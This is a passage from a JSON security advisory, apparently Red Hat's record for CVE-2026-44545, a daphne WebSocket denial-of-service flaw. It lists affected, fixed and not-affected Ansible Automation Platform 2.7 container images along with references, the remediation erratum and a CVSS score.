"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "daphne: daphne: Denial of Service via excessive WebSocket message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44545"
},
{
"category": "external",
"summary": "RHBZ#2484377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44545",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545"
},
{
"category": "external",
"summary": "https://github.com/django/daphne/blob/main/CHANGELOG.txt",
"url": "https://github.com/django/daphne/blob/main/CHANGELOG.txt"
}
],
"release_date": "2026-06-03T13:17:42.907000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
